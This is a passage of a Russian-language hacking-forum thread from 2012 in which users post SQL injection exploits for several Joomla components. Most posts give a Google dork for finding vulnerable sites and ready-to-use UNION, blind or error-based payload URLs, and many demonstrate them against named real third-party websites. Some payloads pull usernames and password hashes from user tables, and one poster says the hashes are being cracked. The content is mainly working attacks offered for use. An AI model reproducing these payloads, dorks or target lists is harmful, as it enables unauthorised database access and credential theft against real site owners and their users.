HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #241  
Старый 16.01.2012, 18:57
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Joomla "com_vid" component SQL Injection

Уязвим параметр id, что позволяет провести SQL-injection.

Эксплyатация:

Код:
Code:
http://site.ltd/index.php?option=com_vid&Itemid=60&section=video&id_catigor=1&id=-1+union+select+1,2,version(),database(),5,6,7--+f
PoC:

Код:
Code:
http://sasha-shmel.ru/index.php?option=com_vid&Itemid=60&section=video&id_catigor=1&id=-1+union+select+1,2,version(),database(),5,6,7--+f
---

Joomla "com_club" component SQL Injection

Уязвим параметр clubid, что позволяет провести SQL-injection.

Dork:

Код:
Code:
inurl:"?option=com_club"
Результатов: примерно 21 000, страница 4 (0,30 сек.)

Эксплyатация:

Код:
Code:
http://site.ltd/index.php?option=com_club&task=detail&clubid=-70002+union+select+version(),database(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+f
PoC:

Код:
Code:
http://vbl.badmintonliga.be/index.php?option=com_club&task=detail&clubid=-70002+union+select+version(),database(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+f
© Ereee​
 
Ответить с цитированием

  #242  
Старый 23.01.2012, 21:49
Machine
Познающий
Регистрация: 23.06.2008
Сообщений: 34
Провел на форуме:
98050

Репутация: 45
Отправить сообщение для Machine с помощью ICQ
По умолчанию

Joomla com_jomdirectory SQL-inj Vuln:

# Date: 21.01.2012

# Author: Mach1ne


Usage:

http://localhost/[PATH/index.php?option=com_jomdirectory&task=search&type = уязвимый параметр (число)

http://localhost/[PATH]/index.php?option=com_jomdirectory&task=search&type =111+[SQLi]

http://localhost/[PATH]/index.php?option=com_jomdirectory&task=search&type =111+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12--

=)

1337day
 
Ответить с цитированием

  #243  
Старый 16.02.2012, 17:23
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Joomla "com_sport" component Blind SQL Injection

Уязвим параметр id_champ, что позволяет провести SQL-injection.

Dork:

Код:
Code:
inurl:"?option=com_sport"
Эксплyатация:

Код:
Code:
http://site.ltd/index.php?option=com_sport&task=user&id_user=161&Itemid=46&id_champ=3+and+substring(version(),1,1)=5--+f
PoC:

Код:
Code:
http://sport.sozvesdie.ru/index.php?option=com_sport&task=user&id_user=161&Itemid=46&id_champ=3+and+substring(version(),1,1)=4--+f  FALSE
http://sport.sozvesdie.ru/index.php?option=com_sport&task=user&id_user=161&Itemid=46&id_champ=3+and+substring(version(),1,1)=5--+f  TRUE
© Ereee​
 
Ответить с цитированием

  #244  
Старый 18.02.2012, 15:19
Machine
Познающий
Регистрация: 23.06.2008
Сообщений: 34
Провел на форуме:
98050

Репутация: 45
Отправить сообщение для Machine с помощью ICQ
По умолчанию

Joomla com_personal Multiple SQL-inj Vuln

# Date: 18.02.2012

# Author: Mach1ne

Множественные уязвимые параметры:

http://localhost/[PATH/index.php?option=com_personal&view=detalle&trbId=[SQL]

http://localhost/[PATH]/index.php?option=com_personal&view=personal&grupo_id=[SQL]

http://localhost/[PATH]/index.php?option=com_personal&id=[SQL]



PoC:


http://www.ceit.es/index.php?option=com_personal&view=detalle&trbId=-2828+UNION+ALL+SELECT+NULL,VERSION(),NULL,NULL,NUL L,NULL,NULL--&catId=91&prsId=1&Itemid=25&lang=en

http://www.ciberes.org/index.php?option=com_personal&view=personal&grupo_ id=4+union+all+select+1,concat(username,0x3a,passw ord),3,4,5,6,7,8,9,10,11+from+ciber_users--+&Itemid=77

http://www.cerpamid.co.cu/index.php?option=com_personal&id=65+AND+(SELECT+65 86+FROM(SELECT+COUNT(*),CONCAT(user(),(version()), FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACT ER_SETS+GROUP%20BY+x)a)&actived=1&active=1&lang=en
 
Ответить с цитированием

  #245  
Старый 18.02.2012, 20:32
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Joomla "com_play" component SQL Injection(два разных компонента, дорк один )

Dork:

Код:
Code:
inurl:"?option=com_play"
1) Уязвим параметр vid, что позволяет провести SQL-injection.

Эксплyатация:

Код:
Code:
http://site.ltd/index.php?option=com_play&Itemid=85&vid=-3+union+select+1,2,3,version(),user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+f
Уязвимый код в play.php:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vid'[/COLOR][COLOR="#007700"]]))[/COLOR][COLOR="#0000BB"]$video_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vid'[/COLOR][COLOR="#007700"]];

else[/
COLOR][COLOR="#0000BB"]$video_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

...

[/
COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM #__hwdvidsvideos WHERE id =[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$video_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]and published = 1"[/COLOR][COLOR="#007700"];

[/COLOR][/COLOR
PoC:

Код:
Code:
http://www.walthamstowstadium.co.uk/index.php?option=com_play&Itemid=57&vid=-3+union+select+1,2,3,version(),user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+f
--

2) Уязвим параметр playid, что позволяет провести SQL-injection.

Эксплyатация:

Код:
Code:
http://site.ltd/index.php?option=com_play&view=play&playid=-19+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15--+f
PoC:

Код:
Code:
http://www.detnorsketeatret.no/index.php?option=com_play&view=play&playid=-19+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15--+f
© Ereee​
 
Ответить с цитированием

  #246  
Старый 20.02.2012, 16:06
Machine
Познающий
Регистрация: 23.06.2008
Сообщений: 34
Провел на форуме:
98050

Репутация: 45
Отправить сообщение для Machine с помощью ICQ
По умолчанию

Joomla com_etree Blind SQL-inj Vuln

# Date: 20.02.2012

# Author: Mach1ne

Уязвимый параметр:

http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=us er&user_id=[SQL]

http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=ca tegory&id=[SQL]



PoC:


http://gradientshift.com/harrisonCounty/index.php?option=com_etree&view=displays&layout=ca tegory&id=6'+and+2=2

http://www.roberts.k12.mt.us/site/index.php?option=com_etree&view=displays&layout=ca tegory&id=7'+and+2=2

http://www.canyoncreekschool.org/?option=com_etree&view=displays&layout=user&user_i d=5'+and+2=2

GET parameter 'user_id' is vulnerable.

---

Place: GET

Parameter: user_id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: option=com_etree&view=displays&layout=user&user_id =5' AND 425=425 AND 'PbgE'='PbgE

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: option=com_etree&view=displays&layout=user&user_id =5' AND SLEEP(5) AND 'bLot'='bLot

---
 
Ответить с цитированием

  #247  
Старый 08.03.2012, 09:59
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Joomla "com_datsogallery" component db prefix discolure

Dork:

Код:
Code:
inurl:"?option=com_datsogallery"
Exploit:

Код:
Code:
1. Находим любой сайт через дорк.
2. Заходим по ссылке два раза:
http://site.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
3. Видим:
DB function failed with error number 1062
Duplicate entry 'bla-bla' for key 1 SQL=INSERT INTO jos_datsogallery_votes ( vpic, vip ) VALUES ('bla-bla')
PoC:

Код:
Code:
http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
http://www.chexov.info/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
и т.д.
Исправление:

Код:
Code:
Нужно сделать нумерацию. Обратитесь к разработчику(любому кодеру).
P.S. Просьба не стучать в ПМ с вопросами "Как юзать баг?", "Как залить шелл через эту уязвимость?".

P.S.S. 0day

© Ereee​
 
Ответить с цитированием

  #248  
Старый 10.03.2012, 14:14
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Joomla "com_datsogallery" component db prefix discolure
Dork:
Код:
Code:
inurl:"?option=com_datsogallery"
Я думаю лучше юзать скуль в данном случае.

Код:
Code:
GET http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'

Duplicate entry '5.0.26-log' for key 1
Код:
Code:
GET http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'

Duplicate entry '5.5.18-cll' for key 'group_key'
Код:
Code:
GET http://www.chexov.info/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'

Duplicate entry '5.0.90-log' for key 1
 
Ответить с цитированием

  #249  
Старый 15.03.2012, 17:28
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Joomla "com_datsogallery" component db prefix discolure
Dork:
Код:
Code:
inurl:"?option=com_datsogallery"
Exploit:
Код:
Code:
1. Находим любой сайт через дорк.
2. Заходим по ссылке два раза:
http://site.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
3. Видим:
DB function failed with error number 1062
Duplicate entry 'bla-bla' for key 1 SQL=INSERT INTO jos_datsogallery_votes ( vpic, vip ) VALUES ('bla-bla')
PoC:
Код:
Code:
http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
http://www.chexov.info/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
и т.д.
Исправление:
Код:
Code:
Нужно сделать нумерацию. Обратитесь к разработчику(любому кодеру).
P.S. Просьба не стучать в ПМ с вопросами "Как юзать баг?", "Как залить шелл через эту уязвимость?".
P.S.S. 0day
© Ereee​

http://joomlaforum.ru/index.php?topic=33952.0;wap2
 
Ответить с цитированием

  #250  
Старый 22.03.2012, 08:48
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Joomla "com_file" component SQL Injection

Уязвим параметр year, что позволяет провести SQL-injection.

Эксплyатация:

Код:
Code:
http://site.ltd/index.php?option=com_file&action=list_files&year=-2011'+union(select+1,concat_ws(0x3a,username,password,usertype),3,4,5,6+from+jos_users+limit+0,1)--+g
PoC:

Код:
Code:
http://www.crandalltexas.com/?option=com_file&action=list_files&year=-2011'+union(select+1,concat_ws(0x3a,username,password,usertype),3,4,5,6+from+jos_users+limit+0,1)--+g
P.S. Скоро будут коды, как хэш сбрутят.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ